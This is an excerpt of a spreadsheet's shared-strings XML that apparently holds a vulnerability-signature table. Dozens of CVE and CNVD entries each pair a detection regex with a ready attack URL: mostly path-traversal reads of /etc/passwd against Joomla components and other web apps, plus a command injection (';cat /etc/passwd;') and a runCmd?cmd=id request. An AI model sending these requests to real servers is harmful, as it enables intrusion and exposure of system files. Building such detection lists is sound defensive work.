    <t>/api/ping?count=5&amp;host=;cat%20/etc/passwd;&amp;port=80&amp;source=1.1.1.1&amp;type=icmp</t>
  </si>
  <si>
    <t>.*?(?:/AdminPage/conf/runCmd\?cmd=id).*</t>
  </si>
  <si>
    <t>/AdminPage/conf/runCmd?cmd=id</t>
  </si>
  <si>
    <t>任意文件包含</t>
  </si>
  <si>
    <t>CNVD-2020-62422</t>
  </si>
  <si>
    <t>.*?(?:/seeyon/webmail\.do\?method=doDownloadAtt&amp;filename=index\.jsp&amp;filePath=\.\./conf/datasourceCtp\.properties).*</t>
  </si>
  <si>
    <t>/seeyon/webmail.do?method=doDownloadAtt&amp;filename=index.jsp&amp;filePath=../conf/datasourceCtp.properties</t>
  </si>
  <si>
    <t>XxunchiCMS</t>
  </si>
  <si>
    <t>CNVD-2020-23735</t>
  </si>
  <si>
    <t>.*?(?:/backup/auto\.php\?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&amp;path=\.\./backup/auto\.php).*</t>
  </si>
  <si>
    <t>/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&amp;path=../backup/auto.php</t>
  </si>
  <si>
    <t>若依</t>
  </si>
  <si>
    <t>CNVD-2021-01931</t>
  </si>
  <si>
    <t>.*?(?:/common/download/resource\?resource=/profile/\.\./\.\./\.\./\.\./Windows/win\.ini|/common/download/resource\?resource=/profile/\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/common/download/resource?resource=/profile/../../../../etc/passwd|/common/download/resource?resource=/profile/../../../../Windows/win.ini</t>
  </si>
  <si>
    <t>Squirrelmail</t>
  </si>
  <si>
    <t>CVE-2006-2842</t>
  </si>
  <si>
    <t>.*?(?:/src/redirect\.php\?plugins\[\]=\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/src/redirect.php?plugins[]=../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2007-4504</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_rsfiles&amp;task=files\.display&amp;path=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_rsfiles&amp;task=files.display&amp;path=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2008-6172</t>
  </si>
  <si>
    <t>.*?(?:/components/com_rwcards/captcha/captcha_image\.php\?img=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2008-4668</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_imagebrowser&amp;folder=\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_imagebrowser&amp;folder=../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2008-6222</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_pro_desk&amp;include_file=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_pro_desk&amp;include_file=../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2008-4764</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_extplorer&amp;action=show_error&amp;dir=\.\.%2F\.\.%2F\.\.%2F%2F\.\.%2F\.\.%2Fetc%2Fpasswd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_extplorer&amp;action=show_error&amp;dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd</t>
  </si>
  <si>
    <t>CVE-2008-6080</t>
  </si>
  <si>
    <t>.*?(?:/components/com_ionfiles/download\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;download=1).*</t>
  </si>
  <si>
    <t>/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&amp;download=1</t>
  </si>
  <si>
    <t>phpPgAdmin</t>
  </si>
  <si>
    <t>CVE-2008-5587</t>
  </si>
  <si>
    <t>.*?(?:/phpPgAdmin/index\.php\?_language=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>Cisco</t>
  </si>
  <si>
    <t>CVE-2009-1558</t>
  </si>
  <si>
    <t>.*?(?:/adm/file\.cgi\?next_file=%2fetc%2fpasswd).*</t>
  </si>
  <si>
    <t>/adm/file.cgi?next_file=%2fetc%2fpasswd</t>
  </si>
  <si>
    <t>Horde/Horde Groupware</t>
  </si>
  <si>
    <t>CVE-2009-0932</t>
  </si>
  <si>
    <t>.*?(?:/horde/util/barcode\.php\?type=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/\./passwd%00).*</t>
  </si>
  <si>
    <t>/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00</t>
  </si>
  <si>
    <t>CVE-2009-3053</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_agora&amp;task=profile&amp;page=avatars&amp;action=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_agora&amp;task=profile&amp;page=avatars&amp;action=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2009-1496</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_cmimarketplace&amp;Itemid=70&amp;viewit=/\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd&amp;cid=1).*</t>
  </si>
  <si>
    <t>/index.php?option=com_cmimarketplace&amp;Itemid=70&amp;viewit=/../../../../../../etc/passwd&amp;cid=1</t>
  </si>
  <si>
    <t>CVE-2009-2100</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_projectfork&amp;section=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_projectfork&amp;section=../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2009-2015</t>
  </si>
  <si>
    <t>.*?(?:/components/com_moofaq/includes/file_includer\.php\?gzip=0&amp;file=/\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/components/com_moofaq/includes/file_includer.php?gzip=0&amp;file=/../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2009-4202</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_omphotogallery&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_omphotogallery&amp;controller=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2009-4679</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_kif_nexus&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_kif_nexus&amp;controller=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2009-3318</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_album&amp;Itemid=128&amp;target=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/index.php?option=com_album&amp;Itemid=128&amp;target=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>CVE-2010-1217</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jeformcr&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jeformcr&amp;view=../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1494</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_awdwall&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_awdwall&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1471</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_addressbook&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_addressbook&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1473</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_advertising&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_advertising&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1979</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_datafeeds&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_datafeeds&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1476</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_alphauserpoints&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_alphauserpoints&amp;view=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1714</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_arcadegames&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_arcadegames&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1718</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_archeryscores&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_archeryscores&amp;controller=../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1952</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_beeheard&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_beeheard&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-0467</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_ccnewsletter&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_ccnewsletter&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-4977</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_canteen&amp;controller=\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_canteen&amp;controller=../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1345</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_ckforms&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_ckforms&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1302</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_dwgraphs&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_dwgraphs&amp;controller=../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1955</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_blogfactory&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_blogfactory&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2045</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_dioneformwizard&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_dioneformwizard&amp;controller=../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1981</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_fabrik&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_fabrik&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2920</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_foobla_suggestions&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_foobla_suggestions&amp;controller=../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1956</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_gadgetfactory&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_gadgetfactory&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1653</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_graphics&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_graphics&amp;controller=../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1314</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_hsconfig&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_hsconfig&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1472</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_horoscope&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_horoscope&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1977</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jwhmcs&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jwhmcs&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1601</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jacomment&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jacomment&amp;view=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1982</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_javoice&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_javoice&amp;view=../../../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-5028</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jejob&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jejob&amp;view=../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2128</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jequoteform&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jequoteform&amp;view=../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1305</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jinventory&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jinventory&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1469</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jprojectmanager&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jprojectmanager&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-4719</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jradio&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jradio&amp;controller=../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1478</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jfeedback&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jfeedback&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-4769</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jimtawl&amp;Itemid=12&amp;task=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jimtawl&amp;Itemid=12&amp;task=../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1980</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_joomlaflickr&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_joomlaflickr&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-4617</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jotloader&amp;section=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jotloader&amp;section=../../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-3426</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jphone&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jphone&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-5286</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jstore&amp;controller=\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jstore&amp;controller=./../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1352</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jukebox&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jukebox&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1353</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_loginbox&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_loginbox&amp;view=../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1957</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_lovefactory&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_lovefactory&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1491</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_mmsblog&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_mmsblog&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2050</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_mscomment&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_mscomment&amp;controller=../../../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1719</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_mtfireeagle&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_mtfireeagle&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1307</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_joomlaupdater&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_joomlaupdater&amp;controller=../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1495</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_matamko&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_matamko&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2857</t>
  </si>
  <si>
    <t>.*?(?:/component/music/album\.html\?cid=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1312</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_news_portal&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_news_portal&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1658</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_noticeboard&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_noticeboard&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1715</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_onlineexam&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_onlineexam&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1722</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_market&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_market&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1878</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_orgchart&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_orgchart&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1461</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_photobattle&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_photobattle&amp;view=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1306</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_joomlapicasa2&amp;controller=\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*\|.*?(?:/index\.php\?option=com_picasa2gallery&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_joomlapicasa2&amp;controller=../../../../../etc/passwd%00\|/index.php?option=com_picasa2gallery&amp;controller=../../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1532</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_powermail&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_powermail&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1475</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_preventive&amp;controller==\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_preventive&amp;controller==../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1875</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_properties&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_properties&amp;controller=../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-2682</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_realtyna&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_realtyna&amp;controller=../../../../../../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1858</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_smestorage&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_smestorage&amp;controller=../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1308</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_svmap&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_svmap&amp;controller=../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1313</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_sebercart&amp;view=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_sebercart&amp;view=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1534</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_shoutbox&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_shoutbox&amp;controller=../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1657</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_smartsite&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_smartsite&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1474</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_sweetykeeper&amp;controller=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00).*</t>
  </si>
  <si>
    <t>/index.php?option=com_sweetykeeper&amp;controller=../../../../../../../../../../etc/passwd%00</t>
  </si>
  <si>
    <t>CVE-2010-1535</t>
  </si>
  <si>
